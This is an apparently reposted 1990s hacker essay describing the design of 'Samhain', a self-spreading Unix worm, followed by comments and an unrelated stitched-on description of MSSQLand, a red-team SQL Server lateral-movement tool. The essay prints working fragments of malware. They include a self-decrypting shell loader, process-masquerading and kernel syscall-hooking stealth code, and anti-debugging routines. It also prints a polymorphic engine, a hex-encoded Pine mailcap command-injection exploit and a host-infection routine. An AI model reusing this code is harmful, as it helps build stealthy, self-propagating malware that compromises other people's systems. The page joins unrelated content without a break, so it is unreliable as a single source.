Writing Worms for Fun or Profit

December 2, 2006

0x00: Preface

Media, kindly supported by AV “experts”, drawn apocalyptical vison of desctruction caused by stupid M$ Outlook / VisualBasic worm, called “ILOVEYOU”. Absurdal estimations – $10M lost for “defending the disease”, especially when you take a look at increasing with the speed of light value of AV companies market shares, made many people sick. Lame VBS application that isn’t even able to spread without luser click-me interaction, and is limited to one, desk-end operating system… Worm that sends itself to people in your addressbook, and, in it’s original version, kills mp3 files on your disk [1].

And you call it dangerous? Stop kidding.

Over year ago, with couple of friends, we started writing a project, called ‘Samhain’ (days ago, on packetstorm, I noticed cute program with same name – in fact it’s not the same app, just a coincidence ;). We wanted to see if it’s difficult to write deadly harmful Internet worm, probably much more dangerous than Morris’s worm. Our goals:

1: Portability – worm must be architecture-independent, and should work on different operating systems (in fact, we focused on Unix/Unix-alikes, but developed even DOS/Win code).
2: Invisibility – worm must implement stealth/masquerading techniques to hide itself in live system and stay undetected as long as it’s possible.
3: Independence – worm must be able to spread autonomically, with no user interaction, using built-in exploit database.
4: Learning – worm should be able to learn new exploits and techniques instantly; by launching one instance of updated worm, all other worms, using special communication channels (wormnet), should download updated version.
5: Integrity – single worms and wormnet structure should be really difficult to trace and modify/intrude/kill (encryption, signing).
6: Polymorphism – worm should be fully polymorphic, with no constant portion of (specific) code, to avoid detection.
7: Usability – worm should be able to realize choosen mission objectives – eg. infect choosen system, then download instructions, and, when mission is completed, simply disappear from all systems.

With these seven simple principles, we started our work. This text describes our ideas, concepts and implementation issues. It is NOT the terrorist’s handbook, and has not been written to help people to write such piece of code on their own. It’s written to show that very serious potential risk, which we virtually can’t avoid or stop, isn’t only hypotetical. Code provided here is partial, often comes from first, instead of most recent, Samhain release and so on. But remember – working model has been written. And this model is deadly dangerous engine, which can be used to very, very bad things. Probably we aren’t the first people who thought about it and tried to write it, that’s what make us scared…

Winter 1998, three bored people somewhere in the middle of Europe.

Sit and relax.

0x01: Portability

This is probably the most important thing – we don’t want code that can run only on Windows, Linux or Solaris, or – worse – can run only on x86. The task is quite easy to complete if you decide to spread your code in platform-independent form. How could it be achieved? Well, most of systems have C compiler :) So we might spread worm in source code, with simple decryptor (let’s say it will be shell script).

But wait, some (not much) systems don’t have C compiler. What can we do? Using wormnet, worm during infection might ask other wormnet members for compiled binary for given platform. Wormnet details have been described in section 0x04. Anyway, binary will contain appended source code, to make futher infections possible within standard procedure. Infection scheme is described in section 0x03.

First version of our decryptor looked like this:

const char decryptor[]="#!/bin/bash\nX=/tmp/.$RANDOM$$\n(dd if=\"$0\" of="
"$X.f~ ibs=1 skip=\x01\x01\x01\x01 count=\x02\x02\x02\x02\x02\x02 ;dd if="
"\"$0\" of=$X.b~ ibs=\x03\x03\x03\x03\x03 skip=1;echo \"int x;main(int c,"
"char**v){char a[99999];int i=read(0,a,99999);for(;x<i;)a[x++]-=atoi(v[1]"
");write(1,a,i);}\" >$X.d~;
test -x /tmp/.a012382~||cc -x c $X.d~-o/\tmp/."
"a012382~;/tmp/.a012382~ \x04\x04\x04 <$X.f~>$X.gz~;gzip -cd <$X.gz~>$X.c"
"~;rm -f $X.f~ $X.d~;cc -O3 -x c $X.c~ -o $X~;chmod 755 /tmp/.a012382~)&>"
"/dev/null;test -x \"$0\"&&exec $X~ \"$0\" $@\n";

const char decryptor[]="#!/bin/bash\nX=/tmp/.$RANDOM$$\n(dd if=\"$0\" of="

"$X.f~ ibs=1 skip=\x01\x01\x01\x01 count=\x02\x02\x02\x02\x02\x02 ;dd if="

"\"$0\" of=$X.b~ ibs=\x03\x03\x03\x03\x03 skip=1;echo \"int x;main(int c,"

"char**v){char a[99999];int i=read(0,a,99999);for(;x<i;)a[x++]-=atoi(v[1]"

");write(1,a,i);}\" >$X.d~;

test -x /tmp/.a012382~||cc -x c $X.d~-o/\tmp/."

"a012382~;/tmp/.a012382~ \x04\x04\x04 <$X.f~>$X.gz~;gzip -cd <$X.gz~>$X.c"

"~;rm -f $X.f~ $X.d~;cc -O3 -x c $X.c~ -o $X~;chmod 755 /tmp/.a012382~)&>"

"/dev/null;test -x \"$0\"&&exec $X~ \"$0\" $@\n";

It used very simple (per-byte increments) “encryption” for source code with custom increment value (decryptor has been modified accordingly to choosen value – \x01, \x02, \x03 and \x04 are changed by encryptor routine). Also, this constant decryptor has been every time re-written using simple polymorphic engine (see section 0x06) to avoid constant strings. Later, we modified encryption routine to something little bit stronger (based on logistic equation number generator in chaotical window) – in fact, it only makes it more difficult to detect in inactive form.

As you can see, this decryptor (or it’s early version shown above) isn’t highly-portable – what if we don’t have bash, compiler, gzip or such utilities? Well, that’s one of reasons we’ve decided to join worms in wormnet – if sent code won’t connect back to parent and report itself, host is not marked as infected, and wormnet is asked for pre-compiled binary for given architecture (assuming we already infected this architecture somewhere in the world, and we had needed utilities, or we’re running the same architecture as infected host).

NOTE: For writing extremely ugly code that can run in DOS, [ba]sh, csh, perl etc and can be compiled with C in the same time, please refer IOCCC archives [2].

Sebastian wrote virus code that can spread both on Windows/DOS platform with C compiler and Unix systems with no modifications nor any interaction. It does cross-partition infections and installs itself as compiler trojan (modifying include files to put evil instructions in every compiled source). It is called Califax and has been developed while writting Samhain, as an excercise to prove that such cross-system jumps are possible. I don’t want to include Sebastian’s sources with no permission, all I want to say
is he did it within 415 lines of c code :) Califax hasn ‘t been incorporated within Samhain project, as we don’t want to infect Winbloze for ideological reasons :P

0x02: Invisibility

After breaking into remote system, worm not always have root privledges, so first of all, we wanted to implement some techniques to hide it, make it look-like any other process in system, and make it hard to kill until there’s a chance to gain higher privledges (for details on system intrusion, please refer section 0x03). Also, we made sure it’s really hard to debug/trace running or even inactive worm – please refer section 0x05 for anti-debug code details.

Our non-privledged process masquerading code consists of following parts:

– masquerading: walk through /proc, choose set of common process names and
change your name to look just like one of them,
– cyclic changes: change your name (and executable name) as well as pid
frequently; while doing it, always keep ‘mirror’ process, in case parent
or child get killed by walking skill-alike programs

Our goal is to make almost impossible (with common tools) to ‘catch’ process, as all /proc parameters (pid, exe name, argv[0]) are changing, and even if one of them is catched, we have ‘mirror’ project. Of course, at first we should avoid such attempts by camouflage. This comment comes from libworm README for Unices:

— snip from README —

a) Anti-scanning routines

Following routines are provided to detect anti-worm stuff, like ‘kill2’
or anything smarter. You should use them before fork()ing:

int bscan(int lifetime);

bscan performs ‘brief scanning’ using only 2 childs. Lifetime should
be set to something about 1000 microseconds. Return values:
0 – no anti-worm stuff detected, please use ascan or wscan.
1 – dumb anti-worm stuff detected (like ‘kill2’); use kill2fork()
2 – smart (or brute) stuff detected, wait patiently

int ascan(int childs,int lifetime);

ascan performs ‘advanced scanning’ using given number of childs
(values between 2 and 5 are suggested). It tests environment
using ‘fake forkbomb’ scenario. Results are more accurate:
0 – no anti-worm stuff detected (you might use wscan())
1 – anti-worm stuff in operation

int wscan(int childs,int lifetime);

wscan acts like ascan, but uses ‘walking process’ scenario. It
seems to be buggy, accidentally returning ‘1’ with no reason,
but it’s also the best detection method. Return values:
0 – no anti-worm stuff detected
1 – anti-worm stuff in operation

int kill2fork();

This is aletrnative version of fork(), designed to fool
dumb anti-worm software (use it when bscan returns 1).
Return value: similar as for fork().

b) Masquerading routines

These routines are designed to masquerade and hide current
process:

int collect_names(int how_many);

collect_names builds process names table with up to
‘how_many’ records. This table (accessible via
‘cmdlines[]’ array) contains names of processes in
system; Return value: number of collected items.

void free_names();

this function frees space allocated by collect_names
when you don’t need cmdlines[] anymore.

int get_real_name(char* buf, int cap);

this function gets real name of executable for current
process to buf (where cap means ‘maximal length’).

int set_name_and_loop_to_main(char* newname,char* newexec);

this function changes ‘visible name’ of process to newname
(you may select something from cmdlines[]), then changes
real executable name to ‘newexec’, and loops to the
beginning of main() function. PID will be NOT changed.
Set ‘newexec’ to NULL if you don’t want to change real exec
name. Return value: non-zero on error.

Note: variables, stack and anything else will be reset. Please
use other way (pipes, files, filenames, process name) to
transfer data from old to new executable

int zero_loop(char* a0);

this function returns ‘1’ if this main() code is reached for
the first time, or ‘0’ if set_name_and_loop_to_main() was
used. Pass argv[0] as parameter. It simply checks if
real_exec_name is present in argv[0].

For more details and source code on architecture-independent non-root process hiding techniques, please refer libworm sources [3] (incomplete for now, but always something).

This routines are weak and might be used only for short-term process hiding. We should as fast as possible gain root access (again, this aspect will be discussed later). Then, we have probably the most complex aspect of whole worm. Advanced process hiding is highly system-dependent, usually done by intercepting system calls. We have developed source for universal hiding modules on some systems, but it not working on every platform Samhain might attack. Techniques used there are based on well-known kernel file and process hiding modules.

Our Linux 2.0/2.1 (2.2 and 2.3 kernels weren’t known at the time ;) our module used technique later described in “abtrom” article on BUGTRAQ by (Sat, 28 Aug 1999 14:40:31) to intercept syscalls [4]. Sebastian wrote stealth file techniques (to return original contents of eventually infected files), while I developed process hiding and worm interface. Module intercepted open, lseek, llseek, mmap, fstat, stat, lstat, kill, ptrace, close, read, unlink, write and execve calls.

For example, new llseek call look this way:

int new_llseek(unsigned int fd,unsigned int offset_high,
               unsigned int offset_low,int *result,unsigned int whence) {
  retval=old_llseek(fd,offset_high,offset_low,result,whence);
  if (retval<0) return retval;
  if (!(file=current->files->fd[fd])) return retval;
  if (S_ISREG(file->f_inode->i_mode) || S_ISLNK(file->f_inode->i_mode))
    if (is_happy(fd) && file->f_pos < SAMLEN) file->f_pos += SAMLEN;
  return retval;
}

int new_llseek(unsigned int fd,unsigned int offset_high,

unsigned int offset_low,int *result,unsigned int whence) {

retval=old_llseek(fd,offset_high,offset_low,result,whence);

if (retval<0) return retval;

if (!(file=current->files->fd[fd])) return retval;

if (S_ISREG(file->f_inode->i_mode) || S_ISLNK(file->f_inode->i_mode))

if (is_happy(fd) && file->f_pos < SAMLEN) file->f_pos += SAMLEN;

return retval;

}

In this case, we wanted to skip samhain code loader at the beginning of file. is_happy() function has been used to identify infected files. Unfortunately, it also has to check length of this loader – remember, it’s dynamically generated. This is code from is_happy() used to determine this size from our decryptor routine:

    // Determine where ELF starts...
    file->f_pos=0;
    BEGIN_KMEM
    r=file->f_op->read(file->f_inode, file, buf,sizeof(buf));
    END_KMEM
    // Groah! We have to write out own atoi... Stupido ;-)
    znaki=0;
    while (znaki!=TH && ++v<r) if (buf[v]=='=') znaki++;
    if (znaki==TH) {
      while (buf[v+(++poz)]!=' ' && v+poz<r) mult=mult*10;
      buf[v+poz]=0;
      poz=1;
      SAMLEN=0;
      while (buf[v+poz]) {
        if (buf[v+poz]-'0'>9) { znaki=1;break; } // Format error (!)
        SAMLEN+=(buf[v+poz++]-'0')*mult;
        mult=mult/10;
      }

// Determine where ELF starts...

file->f_pos=0;

BEGIN_KMEM

r=file->f_op->read(file->f_inode, file, buf,sizeof(buf));

END_KMEM

// Groah! We have to write out own atoi... Stupido ;-)

znaki=0;

while (znaki!=TH && ++v<r) if (buf[v]=='=') znaki++;

if (znaki==TH) {

while (buf[v+(++poz)]!=' ' && v+poz<r) mult=mult*10;

buf[v+poz]=0;

poz=1;

SAMLEN=0;

while (buf[v+poz]) {

if (buf[v+poz]-'0'>9) { znaki=1;break; } // Format error (!)

SAMLEN+=(buf[v+poz++]-'0')*mult;

mult=mult/10;

}

Worm isn’t spreading across the filesystem widely, so the problem doesn’t affect many files – only some executables called in boot process – to make sure we’re always resident. Process hiding is quite generic:

int new_ptrace(int req,int pid,int addr,int dat) {
  x=0;
  buf[20]=0;
  sprintf(b,"/proc/%d/cmdline",pid);
  if (active)
    BEGIN_KMEM
    x=old_open(b,O_RDONLY,0);
    END_KMEM
  if (x>0) {
    BEGIN_KMEM
    read(x,b,1);
    END_KMEM
    close(x);
    if (!b[0]) return -ESRCH;
  }
  return old_ptrace(req,pid,addr,dat);
}

int new_ptrace(int req,int pid,int addr,int dat) {

x=0;

buf[20]=0;

sprintf(b,"/proc/%d/cmdline",pid);

if (active)

BEGIN_KMEM

x=old_open(b,O_RDONLY,0);

END_KMEM

if (x>0) {

BEGIN_KMEM

read(x,b,1);

END_KMEM

close(x);

if (!b[0]) return -ESRCH;

}

return old_ptrace(req,pid,addr,dat);

}

Also, we have to hide active network connections for wormnet and sent/received wormnet packets to avoid detection via tcpdump, sniffit etc.

That’s it, nothing uncommon. Similar code has been written for some other platforms. See my AFHaRM or Sebastian’s Adore modules for implementation of stealth techniques [5].

0x03: Independence + 0x04: Learning

Wormnet. The magic word. Wormnet is used to distribute upgraded Samhain modules (eg. new exploit plugins), and to query other worms for compiled binaries. Communication scheme isn’t really difficult, using TCP streams and broadcast messages within TCP streams. Connections are persistent. We have four types of requests:

– infection confirmation: done simply by connecting to parent worm
if infection succeded (no connection == failure),
– update request: done by re-infecting system (in this case, already installed
worm verifies signature on new worm when receiving request, then swaps
process image by doing execve() if requesting binary has newer timestamp),
then inheriting wormnet connections table and sending short request to
connected clients, containing code timestamp.
– update confirmation: if timestamp sent on update request is newer than
timestamp of currently running worm, it should respond with ‘confirmation’,
then download new code via the same tcp stream; then, it should verify
code signature, and eventually swap it’s process image with new exec, then
send update request to connected worms.
– platform request: by sending request to every connected worm (TTL
mechanism is in use) describing machine type, system type and system
release, as well as IP and port specification; this request is sent
(with decreased TTL) to other connected wormnet objects, causing
wormnet broadcast; first worm that can provide specific binary, should
respond connecting to given IP and port, and worm that sent platform
request should accept it (once). Any futher connects() (might happen
till TTL expiration) should be refused. After connecting, suitable
binary should be sent, then passed to infection routines. Worm should
try first with TTL approx 5, then, on failure, might increase it by 5
and retry 3-5 times, we haven’t idea about optimal values.

Packets are “crypted” (again, nothing really strong, security by obscurity) with key assigned to specific connection (derived from parent IP address passed on infection). Type is described by one-byte field, then followed by size field and RAW data or null-terminated strings, eventually with TTL/timestamp fields (depending on type of message).

Wormnet connections structure looks arbitrary and is limited only by max per-worm connections limit. Connections are initiated from child to parent worm, usually bypassing firewall and masquerading software.

On infection, short ‘wormnet history’ list is passed to child. If parent has too many wormnet connections at time, and refuses new connection, child should connect to worm from the history list.

         3
          |
          |               
  3 ----- 2 ---- 3 ----- 4 ------- 5 ------- 6
  |     /        |                 |
  |   /          |                 |
  | /            |                 |		Possible wormnet structure.
  1 ------------ 2 ----- 3         6		Numbers represent infection
    \                  /			order. Bottom "3" couldn't
      \              /				for some reason connect to
        \          /                            it's parent and choosen
          \ ---- 3 ------ 4                     "1" from 'history list'.
                 |
                 |
                 |
                 4

3 ----- 2 ---- 3 ----- 4 ------- 5 ------- 6

| / | |

| / | | Possible wormnet structure.

1 ------------ 2 ----- 3 6 Numbers represent infection

\ / order. Bottom "3" couldn't

\ / for some reason connect to

\ / it's parent and choosen

\ ---- 3 ------ 4 "1" from 'history list'.

What about exploits? Exploits are modular (plugged into worm body), and divided in two sections – local and remote. We wanted to be platform independent, so we focused on filesystem races, bugs like -xkbdir hole in Xwindows, and inserted just a few buffer overflows, mainly for remote intrusion (but we decided to incorporate some bugs like remote pine mailcap exploit and so on… Code was kind of shell-quoting masterpiece ;)

Pine mailcap exploit (it has been already fixed after my BUGTRAQ post, but in late 1998 it was something new and nice):

fprintf(f,"From: \"%s\" <%s@%s>\n",nam,us,buf2);
fprintf(f,"To: <root@%s>\n",hostname);
fprintf(f,"Subject: %s\n",top);
fprintf(f,"MIME-Version: 1.0\n");
fprintf(f,"Content-Type: multipart/mixed;\n");
fprintf(f,"\tboundary=\"----=_NextPart_000_0007_01BD5F09.B6797740\"\n\n");
fprintf(f,"------=_NextPart_000_0007_01BD5F09.B6797740\n");
fprintf(f,"Content-Type: default/text;\n\t");

fprintf(f,"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x5c\x5c\x5c\x22\x78\x5c"
        "\x5c\x5c\x22\x5c\x20\x3d\x3d\x5c\x20\x5c\x5c\x5c\x22\x78\x5c\x5c"
        "\x5c\x22\x5c\x20\x5c\x29\x5c\x20\x73\x68\x5c\x20\x2d\x63\x5c\x20"
        "\x65\x63\x68\x6f\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x66\x6f\x72"
        "\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x69\x5c\x24\x5c\x49\x46\x53"
        "\x5c\x5c\x5c\x69\x6e\x5c\x24\x5c\x49\x46\x53\x5c\x60\x6c\x73\x5c"
        "\x24\x49\x46\x53\x2f\x74\x6d\x70\x2f\x5c\x60\x5c\x24\x5c\x49\x46"
        "\x53\x5c\x5c\x5c\x3b\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x64\x6f"
        "\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x73\x68\x5c\x24\x5c\x49\x46"
        "\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x5c\x5c\x5c\x24\x69\x5c\x24"
        "\x5c\x49\x46\x53\x5c\x5c\x5c\x3b\x64\x6f\x6e\x65\x26\x3e\x2f\x74"
        "\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x3b\x5c\x73\x68\x5c\x24\x49\x46"
        "\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x22\x0A");

// 'encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ sh\ -c\ echo\$\IFS\\\for'
// '\$\IFS\\\i\$\IFS\\\in\$\IFS`ls\$IFS/tmp/`\$\IFS\\\;\$\IFS\\\do'
// '\$\IFS\\\sh\$\IFS\\\/tmp/\\\$i\$\IFS\\\;done&>/tmp/.KEWL;\sh\$IF'
// 'S\\\/tmp/.KEWL"'

fprintf(f,"From: \"%s\" <%s@%s>\n",nam,us,buf2);

fprintf(f,"To: <root@%s>\n",hostname);

fprintf(f,"Subject: %s\n",top);

fprintf(f,"MIME-Version: 1.0\n");

fprintf(f,"Content-Type: multipart/mixed;\n");

fprintf(f,"\tboundary=\"----=_NextPart_000_0007_01BD5F09.B6797740\"\n\n");

fprintf(f,"------=_NextPart_000_0007_01BD5F09.B6797740\n");

fprintf(f,"Content-Type: default/text;\n\t");

fprintf(f,"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x5c\x5c\x5c\x22\x78\x5c"

"\x5c\x5c\x22\x5c\x20\x3d\x3d\x5c\x20\x5c\x5c\x5c\x22\x78\x5c\x5c"

"\x5c\x22\x5c\x20\x5c\x29\x5c\x20\x73\x68\x5c\x20\x2d\x63\x5c\x20"

"\x65\x63\x68\x6f\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x66\x6f\x72"

"\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x69\x5c\x24\x5c\x49\x46\x53"

"\x5c\x5c\x5c\x69\x6e\x5c\x24\x5c\x49\x46\x53\x5c\x60\x6c\x73\x5c"

"\x24\x49\x46\x53\x2f\x74\x6d\x70\x2f\x5c\x60\x5c\x24\x5c\x49\x46"

"\x53\x5c\x5c\x5c\x3b\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x64\x6f"

"\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x73\x68\x5c\x24\x5c\x49\x46"

"\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x5c\x5c\x5c\x24\x69\x5c\x24"

"\x5c\x49\x46\x53\x5c\x5c\x5c\x3b\x64\x6f\x6e\x65\x26\x3e\x2f\x74"

"\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x3b\x5c\x73\x68\x5c\x24\x49\x46"

"\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x22\x0A");

// 'encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ sh\ -c\ echo\$\IFS\\\for'

// '\$\IFS\\\i\$\IFS\\\in\$\IFS`ls\$IFS/tmp/`\$\IFS\\\;\$\IFS\\\do'

// '\$\IFS\\\sh\$\IFS\\\/tmp/\\\$i\$\IFS\\\;done&>/tmp/.KEWL;\sh\$IF'

// 'S\\\/tmp/.KEWL"'

Message body contained code to be executed (shell-script to connect, download and run worm, then kill any evidence). Yes, this exploit sucks – as it required some kind of user interaction (reading e-mail), but is just an example.

Both remote and local exploits are sorted by effectiveness. Exploits that succed most of the time are tried first. Less effective ones are moved at the end. This list is inherited by child worms.

Oh, spreading. Victims are choosen by monitoring active network connections. With random probability, servers are picked from this list and attacked. In case of success, server is added to ‘visited’ list – these are not attacked anymore. In case of failure, server is not attacked until new version of worm is uploaded. Of course, internal servers list is finite and sometimes server might be attacked again (if it’s not our child and it isn’t currently connected), but who cares, attempt will be ignored or upgrade procedure will happen, depending on timestamps.

This code is used to qualify host (obtained from network stats):

void infect_host(int addr) {
  struct hostent* h;
  int (*exp)(char*);
  int i=0,n=0,max=VERY_SMALL;
  if ((0x7F & addr)==0x7F) return;      // do not touch 127.* subnet :-)
  h=gethostbyaddr((void*)&addr,4,AF_INET);
  if (is_host_happy(h->h_name)) return; // In wormnet?
  for (i=0;remote[i].present;i++) remote[i].used=0;
  while ((max=VERY_SMALL)) {
    n=-1;
    for (i=0;remote[i].present;i++)
      if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }
    if (n<0) break;
    exp=remote[n].handler;
    remote[n].used=1;
    current_module=n;
    remote[n].hits+=(i=exp(h->h_name));
    if (i>0) break;
  }
}

void infect_host(int addr) {

struct hostent* h;

int (*exp)(char*);

int i=0,n=0,max=VERY_SMALL;

if ((0x7F & addr)==0x7F) return; // do not touch 127.* subnet :-)

h=gethostbyaddr((void*)&addr,4,AF_INET);

if (is_host_happy(h->h_name)) return; // In wormnet?

for (i=0;remote[i].present;i++) remote[i].used=0;

while ((max=VERY_SMALL)) {

n=-1;

for (i=0;remote[i].present;i++)

if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }

if (n<0) break;

exp=remote[n].handler;

remote[n].used=1;

current_module=n;

remote[n].hits+=(i=exp(h->h_name));

if (i>0) break;

}

0x05: Integrity

The most important thing in worm’s life is not to get caught. We have to be sure it’s not easy to trace/debug us – we want to make reverse-engineering even harder. We don’t want to expose our internal wormnet protocols, communication with kernel module and detection techniques used by worms to check for themselves, etc. Four things:

– hide everything: see section 0x02.
– hash, crypt, scramble: see sections 0x01, 0x04.
– don’t let them caught you: see section 0x02.
– avoid debugging even if we cannot hide!

We used several anti-debugger techniques, including application-dependent (bugs in strace on displaying some invalid parameters to syscalls, bugs in gdb while parsing elf headers, ommiting frame pointer, self-modyfing code and so on), as well as some universal debugger-killer routines called quite often (they aren’t really time-expensive). This is one of them:

void kill_debug(void) {
  int x,n;
  n=getppid();
  if (!(x=fork())) {
    x=getppid();
    if (ptrace(PTRACE_ATTACH,x,0,0)) {
      fprintf(stderr,
          "\n\n\n*****************************************\n"
                "*** I REALLY DO NOT LIKE TO BE TRACED ***\n"
                "*****************************************\n\n\n");
      ptrace(PTRACE_ATTACH,n,0,0);
      kill(x,9);
    }
    usleep(1000);
    ptrace(PTRACE_DETACH,x,0,0);
    exit(0);
  }
  waitpid(x,&n,0);
  return;
}

void kill_debug(void) {

int x,n;

n=getppid();

if (!(x=fork())) {

x=getppid();

if (ptrace(PTRACE_ATTACH,x,0,0)) {

fprintf(stderr,

"\n\n\n*****************************************\n"

"*** I REALLY DO NOT LIKE TO BE TRACED ***\n"

"*****************************************\n\n\n");

ptrace(PTRACE_ATTACH,n,0,0);

kill(x,9);

}

usleep(1000);

ptrace(PTRACE_DETACH,x,0,0);

exit(0);

}

waitpid(x,&n,0);

return;

}

As I told before, worm modules were signed. First, using simple signatures, then using simple private key signing (not really difficult to crack, as key was relatively short, but for sure too difficult for amateurs). This made us sure we’re going to replace our worm image with REAL worm, not dummy anti-worm flare.

0x06: Polymorphism

Polymorphic engine was quite simple – designed to make sure our decryptor will be different every time. As it has been written in shell language, it was pretty easy to add bogus commands, insert empty shell variables, add \ and break contents, or even replace some parts with $SHELL_VARIABLES declared before. Getting original content is not quite easy, but of course, all you have to do is to imitate shell parsing of this decryptor to get original contents, then you’ll be able to identify at least some common code.

Code adding \ to decryptor looks like:

while (decryptor[x]) {
    switch (decryptor[x]) {
      case ' ':
        if (!rnd(2)) buf[y++]=' '; else goto difolt;
        break;
      case '\n':
        if (!you_can) you_can=1;
      default:
      difolt:
        if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&
             decryptor[x]!='>' && decryptor[x]!='<' && norm>2) {
          buf[y++]='\\';buf[y++]=10;norm=0;
        } else {buf[y++]=decryptor[x++];norm++;}
    }
  }

while (decryptor[x]) {

switch (decryptor[x]) {

case ' ':

if (!rnd(2)) buf[y++]=' '; else goto difolt;

break;

case '\n':

if (!you_can) you_can=1;

default:

difolt:

if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&

decryptor[x]!='>' && decryptor[x]!='<' && norm>2) {

buf[y++]='\\';buf[y++]=10;norm=0;

} else {buf[y++]=decryptor[x++];norm++;}

}

0x07: Usability

It’s stupid to launch worm designed eg. to steal secret information from specific host, because we have no idea if it will work fine, and won’t be caught. If so, it might be debugged (it’s made to be hard to debug, but, as every program, it’s not impossible to do it, especially if you’re able to separate worm code). Instead, we should be able to release ‘harmless’ worm, then, when we’re sure it accessed interesting host and haven’t been caught, we might send an update, which will try to reach destination worm, replace it with our evil code, then shut down every worm it can access via wormnet (by sending signed update, that will send itself to other worms, then shut down).

Maybe it isn’t the perfect solution, but in fact it’s probably much safer than inserting even generic backdoor code by default.

0x08: What happened then?

That’s it, the Samhain project, fit into approx. 40 kB of code. What happened to it? Nothing. It hasn’t been ever released, and I never removed restrictions from lookup_victim() and infect_host() routines. It’s still lying on my hard drive, getting covered with dust and oblivion, and that’s extacly what we wanted.

I stopped developing new code and testing it in January, 1999, with Samhain 2.2 and approx. 10000 lines of code. Wojtek Bojdol has been developing his much more advanced wormnet and system infection/monitoring code till February or March, but I haven’t found enough time to incorporate his sources within mainstream source tree. Then, we removed our repository from networked server we used to exchange ideas. I gradually published some bugs used in exploit database to BUGTRAQ, some of them (especially those not discovered by me) we kept for ourselves.

The story ends. Till another rainy day, till another three bored hackers.

You may be sure it will happen. The only thing you can’t be sure is the end of next story.

0x09: References

[1] ILOVEYOU worm:
Dramatical headlines:
+ http://www.cnn.com/2000/TECH/computing/05/04/iloveyou.03/
Technical analysis:
+ http://www.securityfocus.com/templates/article.html?id=30
Source of “ILOVEYOU” worm:
+ http://packetstorm.securify.com/viral-db/love-letter-source.txt

[2] International Obfuscated C Code Contest archives:
+ http://www.ioccc.org

[3] Libworm – unprivledged process hiding techniques:
+ http://lcamtuf.na.export.pl/pliki/libworm.tgz

[4] “yet another article about stealth modules in linux”
+ http://www.securityfocus.com

[5] Advanced File Hide and Redirect Module (in fact, old and lame ;)
+ http://lcamtuf.na.export.pl/pliki/afharm.zip
Adore
+ ???

Again this is an old article but it’s a good one, written by Michal Zalewski and edited by Darknet

Buffer

Comments

zmx says

December 2, 2006 at 12:24 pm

why are you copying articles from other people and post them on your website? the right thing would be to provide a link to this paper not copy&paste it here. some people may think that you wrote it. and where is the 0x0f paragraph?
Darknet says

December 2, 2006 at 7:39 pm

The old articles I post are the original text file articles that were hosted on the old Darknet site since the 90’s.

Sometimes I see people still coming to this site searching for these old articles so I take the time to format them properly as everything has now moved to HTML and provide something that is still in demand.

I wouldn’t call it copying as no one here is claiming we wrote this as clearly stated.
zmx says

December 3, 2006 at 8:34 am

You are right, I’m sorry.
I overreacted when I realized the 0x0f paragraph is missing.
Check the
original text.

I’m a big fan of Michal Zalewski :)
Darknet says

December 5, 2006 at 4:37 pm

Don’t worry man, I’m a great fan of Michael’s too, I wouldn’t pretend I can write anything as good as this!

Ah didn’t see that last bit.

MSSQLand – Lightweight MS-SQL Interaction Tool for Lateral Movement and Post-Exploitation

MSSQLand is a .NET Framework 4.8 utility designed for interacting with Microsoft SQL Server database management systems during red team operations and security audits. Built for constrained environments where operations must be executed directly through beacons using assembly execution, the tool enables operators to traverse linked SQL Server instances, impersonate users, and execute actions without needing complex Transact-SQL (T-SQL) queries. The project was released in March 2026 and fills a critical gap in SQL Server post-exploitation workflows where traditional database tools are unavailable or impractical.

Unlike SQL Server Management Studio (SSMS) or Python-based tools like mssqlclient-ng, MSSQLand is optimized for lateral movement scenarios where an operator already has initial SQL Server access but needs to pivot through linked instances or escalate privileges via impersonation. The tool automates the tedious process of manually crafting Remote Procedure Call (RPC) and OPENQUERY statements across linked server chains, allowing red teams to focus on execution rather than syntax debugging.

Features

Linked server chain traversal with automatic OPENQUERY and RPC Out handling for multi-hop SQL Server scenarios
User impersonation via EXECUTE AS USER to escalate privileges within database contexts without needing system-level permissions
Configuration Manager (ConfigMgr) support for exploiting and enumerating Microsoft Configuration Manager deployments (formerly known as SCCM/MECM)
Connection testing mode that validates credentials without executing queries, ideal for a minimal OPSEC footprint during reconnaissance
Clean Markdown-compatible output tables suitable for direct paste into engagement reports and documentation
CSV export format option for automated processing and integration with other toolchains
Assembly execution ready, built with Cobalt Strike, Havoc, Sliver, and other C2 frameworks in mind
Multiple authentication methods, including Windows authentication, SQL Server authentication, and Kerberos tickets (via external tools)

Installation

MSSQLand is distributed as a pre-compiled Windows executable. Download the latest release from the GitHub Releases page and transfer the executable to your target environment or beacon working directory.

# Download from GitHub Releases
# https://github.com/n3rada/MSSQLand/releases

# For operators compiling from source
# Requires Visual Studio with .NET Framework 4.8 SDK
git clone https://github.com/n3rada/MSSQLand.git
cd MSSQLand
# Open MSSQLand.sln in Visual Studio and build for x64 Release

The tool is designed for assembly execution from C2 frameworks. No installation or registration is required on the target system, making it suitable for operations in restricted or monitored environments.

Usage

This repository does not provide a global --help flag in the traditional sense. The following usage information is reproduced verbatim from the README and GitHub documentation.

MSSQLand.exe <host> [options] <action> [action-options]

# Connection test only (no action executed)
MSSQLand.exe localhost -c token

# Execute specific action
MSSQLand.exe localhost -c token info
